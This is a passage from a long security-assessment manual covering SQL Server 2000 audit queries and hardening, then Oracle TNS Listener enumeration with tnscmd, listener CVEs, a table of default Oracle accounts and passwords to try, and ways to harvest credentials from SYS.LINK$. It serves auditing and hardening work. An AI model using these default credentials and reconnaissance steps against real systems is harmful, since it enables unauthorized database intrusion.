H.1.1.5 LOGIN AUDIT LEVELS:
Auditing helps in keeping track of access to the SQL Server. The level of auditing can be
checked using the query:
exec xp_loginconfig "audit level"
Login Audit Levels
Value
All
Description
logs both successful and failed logging attempts. This is the
preferred auditing setting
Failure
Auditing of only only failed attempts to SQL Server are logged.
Success
Auditing of only only success attempts to SQL Server are logged.
None
This setting is not preferred at all and you should immediately turn
on the auditing and set it to ‘all’
H.1.1.6 DATABASE INITIALIZATION CONFIGURATION
You may view the server configuration parameters by issuing the following query:
exec sp_configure
Check for the values of the following parameters:
‘allow updates’
Ad-hoc updating of system tables is very critical as it could disrupt a running instance of
SQL Server or cause loss of data. Hence updates to system tables should be strictly
prohibited, not only for security reasons but also for performance stability. The default
settings for ‘allow update’ is 0, which prevents ad-hoc access to system tables, even if
user has appropriate permissions. If its value is set to 1 it allows system table updates
using ad-hoc queries, and a user can also create stored procedure to update system
Page 468 of 1123
tables. Once stored procedures get created while ‘allow update’ is enabled, these stored
procedures have the ability to update system tables even when allow update is disabled.
‘c2 audit mode’
As stated SQL Server 2000 is C2 compliant, and provides for extensive auditing facilities
as per the C2 standard. This setting by default is 0, and it is recommended to set it to 1.
See the section on Auditing for more information.
‘remote access’
This option is used to control logins from remote servers running instances of SQL
Server. Remote access is used with remote stored procedures. Set remote access to 1
to allow logins from remote servers. Set the option to 0 to secure a local server and
prevent access from a remote server.
If this setting is absolutely necessary check the credentials of remote users and minimize
his access to the database tables and procedures
‘scan for startup procs’
After SQL Server service is started, it checks if this setting is enabled or not. If it’s
enabled, SQL Server scans and executes the stored procedures, which are configured
to execute at startup. Review the startup stored procedures for Trojans or any malicious
code.
H.1.1.7 SCHEDULED JOBS
SQL Server automatically executes the jobs scheduled at a particular time at particular
intervals. Verify the jobs and check the code if it is a user defined stored procedure. This
is a good place to launch any malicious code without getting noticed. This information is
stored in the msdb system database:
msdb..sp_help_job
Page 469 of 1123
H.1.1.8 EXTENDED AND STORED PROCEDURES
Ensure that the extended stored procedure xp_cmdshell is removed. xp_cmdshell, is a
very critical procedure which allows execution of Operating System commands.
Check permissions on this procedure and ensure that only authorized user like sysadmin
has execute permission.
exec sp_helprotect xp_cmdshell
To drop this extended procedure (do not do this for an assessment):
exec sp_dropextendedproc xp_cmdshell
The same security measures should be adopted for other extended procedures as well.
It may not be feasible to drop them, but the access to these must be given only to the
sysadmin role.
sp_Mssetalertinfo
xp_regdeletevalue
sp_MSSetServerProperties
xp_regenumvalues
xp_readerrorlog
xp_regenumkeys
sp_runwebtask
xp_regread
xp_execresultset
xp_regremovemultistring
xp_printstatements
xp_regwrite
xp_displayparamstmt
xp_instance_regaddmultistring
sp_add_job
xp_instance_regdeletekey
sp_add_jobstep
xp_instance_regdeletevalue
sp_add_jobserver
xp_instance_regenumkeys
Page 470 of 1123
sp_start_job
xp_instance_regenumvalues
sp_get_sqlagent_properties
xp_instance_regread
xp_execresultset
xp_instance_regremovemultistring
xp_printstatements
xp_instance_regwrite
xp_displayparamstmt
xp_regdeletekey
xp_regaddmultistring
All support for SQL mail must be removed by dropping the following stored procedures:
xp_stopmail, xp_startmail, xp_deletemail, xp_sendmail
Check permissions on all stored and extended procedures in master and msdb:
use [master / msdb]
select O.name from sysobjects O, sysprotects P where O.uid=0 and xtype in
('X','P') and O.id=P.id
H.1.1.8.1 STARTUP STORED PRODECURES
Check those stored procedures those are scheduled to be executed when the database
starts. Study the code of each procedure and determine nothing malicious or
unauthorized is present:
select * from sysobjects where (status & 2)=2 and xtype in (‘X’,’P’)
H.1.1.9 USERS AND ROLES
Gather the list of all SQL logins and ensure that each login maps to an actual physical
user:
use master
select * from sysxlogins
Page 471 of 1123
Ensure that all the logins are genuine physical users, and there are no dummy accounts
such as ‘test’ or ‘vendor’. Ensure that there is no ‘guest’ account (except from ‘master’
and ‘msdb’).
Check those logins, which have a default database of ‘master’. The 'master' database
contains the system tables and system stored procedures, which are used by SQL
Server for running the SQL Server Service. Any tampering of data in this database may
stop SQL Server from running. The user can change the stored procedures or update or
delete the system tables for privilege escalation. Therefore it is advisable to keep away
low-privileged users from 'master' and allow access to only Security admin and System
admin.
select name from master..sysxlogins where dbid=1
Gather the list of users that are Windows Authenticated. See the section on
Authentication Modes above. Check if these are valid users for access to SQL Server,
and review their roles and privileges:
select name, password, loginname from master..syslogins where isntname=1
Check if any of the users have null password:
select name from master..sysxlogins where password is NULL
To view the list of users for each particular database:
use [database_name]
exec sp_helpuser
Check that all the users are valid database users and that they belong to valid roles
Check the roles and privileges of users in the critical ‘master’ and ‘msdb’ databases, as
well as those in your current database:
master..sp_helpuser
Page 472 of 1123
msdb..sp_helpuser
database roles are identified by GroupName
Orphaned windows logins
Check for all the SQL Server windows logins, which are deleted from Windows but still
exist in the SQL Server. This does not cause any immediate threats but someone who
has UPDATE permissions on sysxlogins table can change his sid to that of Windows
user and all the rights and permissions of Windows user will be automatically granted to
him. Orphaned windows logins will also create problems in accountability.
exec master..sp_validatelogins
Mismatched UserIds
Ensure that for a particular user the LoginName in the SQL server and the UserName in
the databases are the same. This is not a security issue but can create problems for
DBAs when assigning permissions.
use [database name]
select l.name as 'Login name',u.name as 'User name' from master..sysxlogins
l,sysusers u where l.sid=u.sid and l.name <> u.name and l.name not in('sa')
Orphaned UserIds
Check for the orphaned users who are not associated with any SQL Logins but exist in
databases. Generally this situation does not exist because when any SQL Login is
deleted then its associated user IDs are also deleted from the databases. However if the
new database is added to SQL Server, which has existing user there will be no SQL
logins associated with them and hence will have to be considered as orphaned.
use [database name]
Page 473 of 1123
select name from sysusers where name not in (select u.name from sysusers u,
master..syslogins l where u.sid=l.sid) and sid is not null and name not in
('guest','dbo')
Do Not Use the ‘sa’ Account
It is strongly recommended not to use the ‘sa’ account due to the history of attacks that it
has. Instead, a very strong password should be assigned to it and it should never be
used to login for administrative tasks. If the Server is configured to use Windows
Authentication mode, the ‘sa’ account cannot be used to login in any case.
SQL Server does not provide for any password security measures such as password
complexity, password history, minimum password age, maximum password age, etc.
Therefore you may need to use utilities such as EnforcePass available at
http://www.nii.co.in/research/tools.html
Page 474 of 1123
H.1.1.10
ROLES:
Roles in an SQL Server are similar to groups in Windows domains. They allow for users,
who perform the same functionality to be grouped together logically. The permissions
required by these users are the same, and can be granted to the role instead of to each
user individually. This greatly reduces the overhead in repeatedly having to grant, deny,
and revoke permissions to users directly. In SQL server, roles are implemented for each
database, other than the server roles, which are discussed below. Also, a hierarchy of
roles can also be created to represent varying levels of privileges.
- Public Role:
The public role exists in every database, including the system databases master, msdb,
tempdb and model. The public role provides the default permissions for users in a
database and cannot be deleted. Functionally, it can be compared to the Everyone
group in the Windows NT 4.0 environment. Every database user is a member of this role
automatically; therefore, users cannot be added or removed from this role.
- Predefined Roles:
SQL Server 2000 includes several predefined roles. These roles have predefined
implied permissions, which cannot be granted to other user accounts. There are two
types of predefined roles: fixed server roles and fixed database roles.
a. Fixed Server Roles:
Fixed server roles are server-wide in their scope. They exist outside of the databases.
Each member of a fixed server role is able to add other logins to that same role.
Note: All members of the Windows BUILTIN\Administrators group (the local
administrator’s group) are members of the sysadmin role by default.
Fixed Server Role
Description
Sysadmin
Performs any activity in SQL Server
Serveradmin
Configures
server-wide
configuration
options, shuts down the server
Page 475 of 1123
Setupadmin
Manages
linked
servers
and
startup
procedures
Securityadmin
Manages server-wide security settings,
including linked servers, and CREATE
DATABASE
permissions.
Resets
passwords for SQL Server authentication
logins
Processadmin
Terminate processes
running in SQL
Server
Dbcreator
Creates, alters, drops, and restores any
database
Diskadmin
Manages disk files
Bulkadmin
Allows a non-sysadmin user to run the
bulkadmin statement.
Only highly privileged and trusted users should be members of these roles. To determine
membership of any role issue the following query:
select name, loginname from master..syslogins where [fixed_server_role]=1
For instance, to determine members of the sysadmin role:
select name, loginname from master..syslogins where sysadmin=1
It is recommended that SQL Server DBAs be granted access to SQL Server through
Windows group membership, and that this group be a member of the sysadmin server
role. However, a Windows administrator can give anyone sysadmin permissions on SQL
Server 2000, as he has rights to add any user to the Windows group. In such a case,
individual Windows accounts should be assigned to the sysadmin role.
b. Fixed Database Roles:
Fixed database roles are defined at the database level and exist in each database.
Members of the db_owner and db_security admin roles can manage fixed database role
Page 476 of 1123
membership; however, only the db_owner can add others to the db_owner fixed
database role.
Fixed Database Role
Description
db_owner
Performs
all
maintenance
and
configuration activities in the database
db_accessadmin
Adds or removes access for Windows
users, groups, and SQL Server logins
db_datareader
Reads all data from all user tables
db_datawriter
Adds, deletes, or changes data in all user
tables
db_ddladmin
Runs any Data Definition Language (DDL)
command in a database
db_securityadmin
Modifies role membership and manages
permissions
db_backupoperator
Backs up the database.
db_denydatareader
Cannot read any data in user tables within
a database
db_denydatawriter
Cannot add, modify, or delete data in any
user tables or views
To determine memberships of these roles for any given database:
exec [database_name]..sp_helprolemember ‘[fixed_database_role]’
For instance, to determine role membership of the ‘db_owner’ role for the msdb
database:
exec msdb..sp_helprolemember ‘db_owner’
c. User-Defined Roles:
User-defined roles provide an easy way to manage permissions in a database when a
group of users performs a specified set of activities in SQL Server 2000 and there is no
applicable Microsoft Windows group, or if the database administrator does not have
permissions to manage the Windows user accounts. In these situations, user-defined
Page 477 of 1123
roles provide the database administrator the same flexibility as Windows groups. Userdefined roles apply only at the database level, and are local to the database in which
they were created.
To determine role memberships for user-defined roles issue the same query as above:
exec [database_name]..sp_helprolemember ‘user_define_role’
d. Application Roles:
Application roles allow the database administrator to restrict user access to data based
on the application that the user is using. Application roles allow the application to take
over the responsibility of user authentication.
When an application makes a connection to SQL Server 2000, it executes the
sp_setapprole stored procedure, which takes two parameters: username and password
(these parameters can be encrypted). The existing permissions assigned to the user are
dropped, and the security context of the application role is assumed.
To determine application roles:
select * from sysusers where issqlrole = 1 and isapprole = 1
H.1.1.11
USER PRIVILEGES AND ACCESS RIGHTS
Permissions within a database are always granted to database users, roles, and
Windows users or groups, but never to SQL Server 2000 logons. The methods used to
set the appropriate permissions for users or roles within a database are: granting
permissions, denying permissions, and revoking permissions.
The GRANT statement is used to grant permissions to a user on a given object.
Page 478 of 1123
The DENY statement allows an administrator to deny an object or statement permission
to a user or role. As with Windows permissions, DENY takes precedence over all other
permissions.
The REVOKE statement is used to remove permissions that were granted earlier.
Permissions can also be granted to a role using the ‘WITH GRANT’ option. This allows
the grantee to later onwards become the grantor and grant that permission to other
users. This must be used sparingly and those permissions that have the ‘WITH GRANT’
option must be audited carefully:
select table_name, grantor,grantee, table_catalog, privilege_type, is_grantable
from information_schema.table_privileges where is_grantable ='YES'
As stated earlier, the PUBLIC role is a default general role, and all users are its
members. Therefore, permissions granted to this role must be carefully audited. In fact,
all permissions must be removed for PUBLIC and required permissions must be granted
to specific roles as per their credentials. To view permissions for PUBLIC for a given
database:
select table_name, grantor,grantee, table_catalog, privilege_type, is_grantable
from [database_name].information_schema.table_privileges where grantee =
'PUBLIC'
To view permissions granted to a given user:
exec sp_helprotect ‘username’
Statement permissions
These are the permissions, which are required for creating objects such as tables and
views. The user who creates the objects becomes the owner and has all the
permissions. These are critical permissions and therefore only authorized users should
have these permissions. Some such permissions are:
Page 479 of 1123
CREATE
DATABASE,
PROCEDURE,
CREATE
CREATE
RULE,
DEFAULT,
CREATE
CREATE
TABLE,
FUNCTION,
CREATE
VIEW,
CREATE
BACKUP
DATABASE, BACKUP LOG
use [database name]
exec sp_helprotect 'CREATE TABLE'
Temporary tables and procedures
Check for all the temporary tables and procedures existing in the databases. These
objects are created in the tempd database. Global temporary tables identified by ## are
accessible to all users by default and therefore it should not contain any critical data.
Temporary stored procedures should be verified against any malicious code.
select substring(name,1,30) as name, case xtype when 'P' then 'Stored proc' when
'U' then 'User table' end as 'ObjectType', crdate as 'created on', refdate as 'referred
on' from tempdb..sysobjects where name like '#%'
Ad-hoc queries by Data-Providers
Disable ad hoc queries for the following data providers. This functionality can be proved
to be fatal since it allows the use of OPENROWSET which fetches data into SQL Server
using OLE DB connection, that could be used to exploit the buffer overflow
vulnerabilities and eventually a sophisticated compromise of SQL Server.
If some data provider explicitly requires this functionality then it should be allowed to use
ad-hoc queries.
‰
Microsoft OLE DB Provider for SQL Server (SQLOLEDB-)
‰
Microsoft OLE DB Provider for Microsoft Jet (Microsoft.Jet.Oledb.4.0)
‰
Microsoft OLE DB Provider for Oracle (MSDAORA)
‰
Microsoft
OLE
DB
Provider
for
Microsoft
Active
Directory
Service
(ADSDSOObject)
‰
Microsoft OLE DB Provider for Indexing Service (MSIDXS)
Page 480 of 1123
‰
Microsoft OLE DB Provider for Microsoft Site Server(MSSEARCHSQL)
‰
Microsoft OLE DB Provider for ODBC(MSDASQL)
To prevent such attack, create a registry key DisallowAdhocAccess and set it to 1
at the this registry path
HKLM\Software\Microsoft\MSSqlServer\Providers\[SQLOLEDB]
Ensure that the registry key DisallowAdhocAccess and set it to 1 for all data providers
SQL Agent Security
Perform the following checks for SQL Server Agent
Ensure that SQL Agent service is not using localsystem or windows administrator
account.
Ensure that only sysadmins are allowed to add scheduled jobs.
Ensure that login name which SQL Agent uses for SQL Server login is not sa or
sysadmin group.
use msdb
exec sp_get_sqlagent_properties
Check for owner of the job and originating server and ensure they are authorized for
scheduling jobs. To list all the scheduled jobs use
use msdb
exec sp_get_composite_job_info
Review the sql commands in each scheduled jobs for any malicious code.
use msdb
Page 481 of 1123
exec sp_help_jobstep [job_id]
You may also view all this information through Enterprise Manager. Go to Management
and right-click on SQL Server Agent. Go to the Properties tab to see which user-account
the Agent is running with.
Within this window go to the Job System tab and ensure that “Only users with SysAdmin
privileges can execute CmdExec and ActiveScripting job steps.
Go to the Connection tab and ensure that the SQLAgent does not authenticate to the
SQL server using the ‘sa’ login.
Also see what Alerts already exist and what Jobs are scheduled.
Page 482 of 1123
H.2 ORACLE SECURITY ASSESSMENT
One of the most vulnerable and high impact attack vectors for an Oracle database is the
TNS Listener service. The Transparent Network Substrate (TNS) protocol is used by
Oracle clients to connect to database instances via the TNS Listener service. The
service listens on TCP port 1521 by default. There exist numerous vulnerabilities in this
service, ranging from information disclosure to buffer overflows. A number of these can
be exploited without any authentication. Even if authentication is required, the large
number of default Oracle accounts results in those attacks being successful as well.
H.2.1.1 TNS LISTENER ENUMERATION AND INFORMATION LEAK ATTACKS
The listener service has its own authentication mechanism and is controlled and
administered using the lsnrctl utility. The default configuration of the TNS Listener
service has no authentication and no logging either. Database security vendor Integrigy
offers a tool for checking Listener service security that can be downloaded from its
http://www.integrigy.com/ .
tnscmd can be used to speak, on a very simple level, with Oracle's TNS listener.. It's a
Perl
script
that's
available
at
http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd.
H.2.1.1.1 PINGING THE TNS LISTENER
You can use tnscmd.pl to issue various commands to the TNS Listener service. If we
want to ping this host to see if it is actually running tnslsnr, we would type:
unix% tnscmd -h oraclebox.example.com -p 1521
sending (CONNECT_DATA=(COMMAND=ping)) to oraclebox.example.com:1521
writing 87 bytes
reading
.I......"..=(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER))
Here we see three things:
‰
the TNS command: (CONNECT_DATA=(COMMAND=ping))
Page 483 of 1123
‰
the raw TNS packet sent to tnslsnr: .W.......6. [ etc ]
‰
and the raw TNS reply packet from tnslsnr: .I......"..=(DESCRIPTION=( [etc]
This reply is typical of 'ping' replies. The VSNNUM is the version number encoded in
decimal. It can be converted to hex, simply by opening up the Windows calculator in
Scientific mode, and entering this number into the text box. Hit the Hex radio button, and
viola! you have the actual Oracle version number.
There are (at least) three commands that are useful for information gathering, version,
status and services:
unix% tnscmd version -h oraclebox.example.com -p 1521
sending (CONNECT_DATA=(COMMAND=version)) to oraclebox.example.com:1521
writing 90 bytes
reading
.M.......6.........-............(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)).
a........TNSLSNR.for.Solaris:.Version.8.1.6.0.0.-.Production..TNS.for.Solaris:
.Version.8.1.6.0.0.-.Production..Unix.Domain.Socket.IPC.NT.Protocol.Adaptor.fo
r.Solaris:.Version.8.1.6.0.0.-.Production..Oracle.Bequeath.NT.Protocol.Adapter
.for.Solaris:.Version.8.1.6.0.0.-.Production..TCP/IP.NT.Protocol.Adapter.for.S
olaris:.Version.8.1.6.0.0.-.Production,,.........@
This is pretty straightforward. version reveals the version of Oracle (in this case,
8.1.6.0.0 for Solaris). Another command, status is a bit more verbose:
unix% tnscmd status -h oraclebox.example.com -p 1521
sending (CONNECT_DATA=(COMMAND=status)) to oraclebox.example.com:1521
writing 89 bytes
reading
.........6.........`.............j........(DESCRIPTION=(TMP=)(VSNNUM=135290880
)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)(VERSION=TNSLSNR.for.Solaris:.Versi
on.8.
1.6.0.0.-.Production)(START_DATE=01-SEP2000.18:35:49)(SIDNUM=1)(LOGFILE=/u01/
Page 484 of 1123
app/oracle/product/8.1.6/network/log/listener.log)(PRMFILE=/u01/app/oracle/pro
[snipped for brevity]
The output is a bit hard to read, but because it's all balanced within parentheses, tnscmd
can break it up with the --indent option and make it readable:
unix% tnscmd status -h oraclebox.example.com -p 1521 --indent
We'll get something like:
DESCRIPTION=
TMP=
VSNNUM=135290880
ERR=0
ALIAS=LISTENER
SECURITY=OFF
VERSION=TNSLSNR.for.Solaris:.Version.8.1.6.0.0.-.Production
START_DATE=01-SEP-2000.18:35:49
SIDNUM=1
LOGFILE=/u01/app/oracle/product/8.1.6/network/log/listener.log
PRMFILE=/u01/app/oracle/product/8.1.6//network/admin/listener.ora
TRACING=off
UPTIME=2032269835
SNMP=OFF
Note SECURITY=OFF. This may indicate whether or not the DBA has assigned a
password to the listener.
Note START_DATE and UPTIME. Not clear if UPTIME is the tnslsnr uptime or the host
uptime.
Note the path to LOGFILE and PRMFILE. This can give you a good idea of the
filesystem layout.
The tnscmd.pl documentation written and maintained by James W. Abendschan at
http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html lists a number of
TNS Listener commands that can be executed remotely using the tool
Page 485 of 1123
H.2.1.2 TNS LISTENER PROCESS-MANIPULATION VULNERABILITIES
There are a number of serious vulnerabilities in the TNS Listener service. A simple
search on CVE with the keywords Oracle TNS Listener reveals the following:
Oracle 8i and 9i with PL/SQL package for External Procedures
CVE-2002-0567
(EXTPROC) allows remote attackers to bypass authentication
and execute arbitrary functions by using the TNS Listener to
directly connect to the EXTPROC process.
Buffer overflow in TNS Listener for Oracle 9i Database Server on
Windows systems, and Oracle 8 on VM, allows local users to
CVE-2002-0965
execute arbitrary code via a long SERVICE_NAME parameter,
which is not properly handled when writing an error message to a
log file.
TNS Listener in Oracle Net Services for Oracle 9i 9.2.x and 9.0.x,
CVE-2002-1118
and Oracle 8i 8.1.x, allows remote attackers to cause a denial of
service (hang or crash) via a SERVICE_CURLOAD command.
Buffer overflow in Transparent Network Substrate (TNS) Listener
in Oracle 8i 8.1.7 and earlier allows remote attackers to gain
CAN-2001-0499
privileges via a long argument to the commands (1) STATUS, (2)
PING, (3) SERVICES, (4) TRC_FILE, (5) SAVE_CONFIG, or (6)
RELOAD.
Transparent Network Substrate (TNS) Listener in Oracle 9i
CAN-2002-0509
9.0.1.1 allows remote attackers to cause a denial of service (CPU
consumption) via a single malformed TCP packet to port 1521.
H.2.1.3 ORACLE BRUTE-FORCE AND POST-AUTHENTICATION ISSUES
Once you identify an Oracle databse, the first attempt should be try and authenticate
with backend database instances. For this you need an Oracle client utility such as the
command-line sqlplus or the barely graphical user interface SQL*Plus. Some products,
such as ISS Database Scanner (http://www.iss.net), and AuditPro for Databases
(http://www.nii.co.in), will run a series of Oracle security checks and carry out a
comprehensive audit. AuditPro (is my firm’s tool, so just plugging it in), comes with a free
Page 486 of 1123
license of its operating system audit module, whenever you take the database audit
module.
The following table lists default Oracle accounts and passwords you can try.
Username
Default Password
Function
SYS
CHANGE_ON_INSTALL
The most powerful account
on the database that owns
all the internal objects that
make
up
the
database
itself.
SYSTEM
MANAGER
The initial very powerful
account from which most of
the object creation is done.
Its default password is so
well-known, that it must be
changed immediately.
SCOTT
TIGER
This account is mainly for
learning
SQL
and
testing
for
database
connectivity
over
the
network. You may choose
to keep it, but it inherits all
the privileges that
have
been given to the PUBLIC
role, and therefore these
must
be
restricted,
or
completely removed.
DBSNMP
DBSNMP
Required
for
Oracle
Enterprise
Manager
Intelligent Agent. This is
used for remote database
administration.
It
is
preferable to not administer
Oracle
from
a
remote
Page 487 of 1123
console, and therefore this
account must be removed
or its password changed.
TRACESVR
TRACE
For Oracle Trace collection,
which is used to collection
performance and resource
utilization data.
CTXSYS
CTXSYS
Supports Context option for
function calls contained the
columns attribute.
MDSYS
MDSYS
Used to support Spatial
Data Option. Remove or
disable unless this option is
required.
DEMO
DEMO
As the name suggests.
CTXDEMO
CTXDEMO
Context
option
demonstration.
APPLSYS
FND
NAMES
NAMES
SYSADM
SYSADM
ORDPLUGINS
ORDPLUGINS
Supports
video
data
attribute
information
for
ORDVideo objects.
OUTLN
OUTLN
Ensures
that
the
SQL
Query optimizer generates
the same final execution
plan when the input SQL
statements are the same.
ADAMS
WOOD
The accounts of ADAMS,
BLAKE,
JONES,
CLARK
are
accounts
for
and
legacy
education
purposes.
BLAKE
PAPER
``
Page 488 of 1123
JONES
STEEL
``
CLARK
CLOTH
``
AURORA$ORB$
Randomly generated
Used for supporting the
Oracle
UNAUTHENTICATED
8i
Aurora
facilities
of
server
to
the
JVM
RDBMS
concurrently
schedule Java execution.
ORDSYS
ORDSYS
Used to support Oracle 8i
Time
Series
enable
Option
working
to
with
calendars and time series
data.
MTSYS
MTSYS
This account supports the
Microsoft
Transaction
Server and the Microsoft
Application Demo software.
APPS
APPS
SAP
SAPR3
The
default
username/password
combination
if
SAP
is
running.
Oracle default account and passwords, as well as some of the best Oracle security
information available in one place is Pete Finnigan’s website at www.petefinnigan.com. It
now even comes with an RSS feed to get you Pete’s analyses of various Oracle security
issues, new articles published, and new Oracle security alerts. I strongly recommend
reading the papers listed there, and using the tools and scripts he has put up.
H.2.1.4 POST-AUTHENTICATION ASSESSMENT
Assuming you’ve managed to gain access to the Oracle database using the accounts
shown above, or through a successful exploit, the main attempt should be to get access
to critical tables, and important data.
H.2.1.4.1 THE SYS.LINK$ TABLE
Page 489 of 1123
Oracle has a feature called as Database links. In this situation, one Oracle database can
connect to another Oracle database, where the first database acts as the client. In order
to be able to connect to the second database, the first database must supply the proper
authentication credentials, which must be stored somewhere within the first database.
This information is stored in the table SYS.LINK$ in plain-text. If the target system is
configured to use database links, then you could potentially execute a SELECT
statement on the LINK$ table and retrieve the username/password used to connect to
the second database. It is thus trivial to compromise the second database.
Caveat: Only users within the DBA group have access to the LINK$ table.
H.2.1.4.2 PRIVILEGE ESCALATION
In case, you have managed to guess only a non-DBA account and do have limited
privileges on the system, a bunch of recent Oracle vulnerabilities can help you elevate
your privileges. A number of these vulnerabilities were discovered by the team at
Nextgen Security Software (www.nextgenss.com), and they have decided to withhold the
information until early next year, by when database administrators will have had a
chance to patch these issues.
However, David Litchfield in his presentation at Blackhat USA 2004, has given some
clues on how this could be done using the SQL injection vulnerabilities present in default
Oracle procedures.
H.2.1.4.3 INITIALIZATION PARAMETERS
Oracle uses a number of parameters, which are set during database initialization. These
parameters can be access from the V$PARAMETER table. The table show below
discusses the security-specific parameters and their implications:
Parameter Name
Title
Description
Users with the ANY privilege (see section on
O7_DICTIONARY_ACCESSI Version
BILITY
7
Dictionary Privileges) would be allowed to access the
Accessibility Support
objects (tables, views, triggers, etc.) in the
SYS schema. These are very critical objects
Page 490 of 1123
with very sensitive information, and you can
prevent
a
user
from
accessing
this
information, even if he has the ANY privileges,
by setting the value of this parameter to
FALSE.
Under
no
circumstances
is
it
recommended to set this value to TRUE.
audit_trail
db_name
To turn auditing on and
control whether Oracle
generates audit records
based on the audit options
currently set, set the
parameter AUDIT_TRAIL
to "DB" in the database's
parameter file. This will
start Oracle’s built-in
auditing and direct all
auditing data to the
database's auditing trail.
Enable system auditing
database
name
DATABASE
specified
in
CREATE
This
is
for
information
purposes only – the name
of the database.
The Oracle configuration
parameter
DBLINK_ENCRYPT_LOG
IN
specifies
whether
attempts to connect to
remote Oracle databases
through
dblink_encrypt_login
enforce password for distributed login always should
be encrypted
database
use
links
encrypted
passwords.
Prior
Oracle
passwords
7.2,
to
were not encrypted before
being
network.
sent
In
over
order
the
to
connect to older servers,
Oracle
included
this
parameter to retry failed
Page 491 of 1123
connections
using
the
unencrypted format. If the
DBLINK_ENCRYPT_LOG
IN parameter is TRUE,
and the connection fails,
Oracle does not reattempt
the
connection.
parameter
Oracle
If
is
this
FALSE,
reattempts
the
connection
using
an
unencrypted
version
of
the
password.
Servers
with
DBLINK_ENCRYPT_LOG
IN set to FALSE can be
coerced
into
unencrypted
by
sending
passwords
computers
linked
between
servers.
This
parameter must be set to
TRUE
in
the
init.ora
configuration file.
(See
the
section
on
Database Links for more
details)
This is just for information
purposes and its value is
instance_name
instance name supported by the instance
the same as that which
you used in the hoststring.
To
log_archive_start
start archival process on SGA initialization
enable
automatic
archiving of filled groups
each time an instance is
Page 492 of 1123
started,
include
initialization
the
parameter
LOG_ARCHIVE_START
in
the
database’s
initialization parameter file
and set it to TRUE. The
new value takes effect the
next time you start the
database.
If the database has been
configured
to
use
Operating
the
System
authentication, rather than
its own, then the users
who are identified on the
OS rather than on the
database, have their user
names on the database
prefixed
os_authent_prefix
by
the
value
shown here in order to
distinguish them as OS
users.
By
default
this
value is OPS$, meaning
that
a
user
who
is
identified on the Operating
System
have
as
a
‘user1’
will
corresponding
database
login
as
‘OPS$user1’
To operate a database so
os_roles
retrieve roles from the operating system
that it uses the operating
system to identify each
user’s
database
Page 493 of 1123
roles
when
a
session
created,
is
set
initialization
the
parameter
OS_ROLES
to
TRUE
(and restart the instance,
if it is currently running).
When a user attempts to
create a session with the
database,
Oracle
initializes
the
user’s
security domain using the
database roles identified
by the operating system.
This may be set to TRUE
if
the
database
is
configured to use external
Operating
System
authentication.
This
parameter
determines the maximum
number
system
can
of
operating
processes
be
that
connected
to
Oracle concurrently. The
value of this parameter
processes
user processes
must include 5 for the
background
and
1
processes
for
each
user
process. For example, if
you
plan
to
have
50
concurrent users, set this
parameter
to
at
least
55.This parameter is set
to an acceptable value.
Page 494 of 1123
This parameter tell Oracle
whether
to
check
authentication information
from a file created using
the ‘orapwd’ utility instead
of the SYS.USER$ table.
This is mainly for remote
administration
of
a
database from a client PC
and should in most cases
be strictly avoided. The
preferred value of this
parameter is NONE. It can
also
remote_login_passwordfile password file usage parameter
be
set
EXCLUSIVE,
means
that
to
which
only
one
instance can use this file,
but it can contain hashed
passwords for users other
than SYS and INTERNAL.
It can also be set to
SHARED, which means
multiple instances can use
the password file, but only
hashed
passwords
for
SYS and INTERNAL are
allowed. See the section
on Users and Roles for
more information on the
INTERNAL account.
It
remote_os_authent
is
allow non-secure remote clients to use auto- recommended
logon accounts
strongly
that
the
value of this parameter be
set to FALSE. Setting it to
Page 495 of 1123
TRUE allows a user to
connect to the database
without
supplying
a
password, as long as he
is
logged
on
to
his
operating system with an
allowed user name. An
attacker can impersonate
the user on his own OS
and
get
connected
to
Oracle, if the user is set
up
for
remote
authentication.
The same logic applies
here as well. This value
must be set to FALSE to
disallow a malicious user
remote_os_roles
allow non-secure remote clients to use os from connecting to the
roles
database and assuming a
role that is identified by
his
own
Operating
System, instead of by the
database.
If a database can be
temporarily
shut
down,
resource limitation can be
enabled or disabled by the
resource_limit
master switch for resource limit
RESOURCE_LIMIT
initialization parameter in
the
database’s
initialization
parameter
file. Valid values for the
parameter
are
Page 496 of 1123
TRUE
(enables
enforcement)
and FALSE; by default,
this parameter’s value is
set to FALSE. Once the
parameter file has been
edited,
the
instance
database
must
be
restarted to take effect.
Every time an instance is
started,
the
new
parameter value enables
or
disables
the
enforcement of resource
limitation.
This
is
the
maximum
number of sessions that
can
connect
database.
sessions
user and system sessions
begin
to
the
Usually,
you
with
the
default
value and increase it if
you find that the peak
usage
is
more
than
expected.
The
SQL92
specify
standards
that
security
administrators should be
able to require that users
sql92_security
require
select
update/delete
privilege
for
searched have SELECT privilege on
a table when executing an
UPDATE
or
DELETE
statement that references
table column values in a
WHERE or SET clause.
Page 497 of 1123
SQL92_SECURITY
lets
you specify whether users
must have been granted
the
SELECT
privilege
in
object
order
to
execute such UPDATE or
DELETE statements.
The UTL_FILE package
allows Oracle to read and
write files on the host
Operating
System.
The
value of this parameter
determines
which
directories on the OS can
be accessed by PL/SQL
utl_file_dir
Directories that the UTL_FILE package can statements. Setting this
access
option to ‘*’ in effect turns
of any access control on
the directories. It must
also not be set to the
current directory ‘.’. In
face,
access
to
the
UTL_FILE package itself
must
be
restricted.
H.2.1.4.4 DEFAULT USERS
The list of users can be seen from the OEM as shown below:
Page 498 of 1123
severely
User Accounts in Oracle 9i (almost all default accounts are locked, except DBSNMP)
As with any other system, the auditor must ensure that only necessary accounts have
been created, and dormant accounts are being regularly removed. Dormant accounts
can
be
extracted
using
the
script
available
at
http://www.petefinnigan.com/audit_last_logon.sql. Also, as far as possible generic
accounts must be avoided.
To see all the users created on the system:
SQL>Select * from DBA_USERS
In order to get only the fields we want to study:
Page 499 of 1123
SQL>Select Username, Password, Account_Status, Default_Tablespace, Profile from
DBA_USERS
Let us study each of these columns one by one. The first two column lists all the users
created in this database, and their hashed passwords. We must ensure that all default
accounts have been removed unless they are absolutely required. The problems with
default accounts are well known: they are common knowledge, their passwords are also
known (see table of default users and passwords below), and they have the privileges
that have been granted to the role PUBLIC (more on this in the section on Roles and
Privileges).
H.2.1.4.5 PROFILES
The final and most important user parameter is the Profile. In Oracle, user account
restrictions in terms of password parameters and resource usage can be set with the use
of Profiles. In a default installation, Oracle creates one profile called the DEFAULT
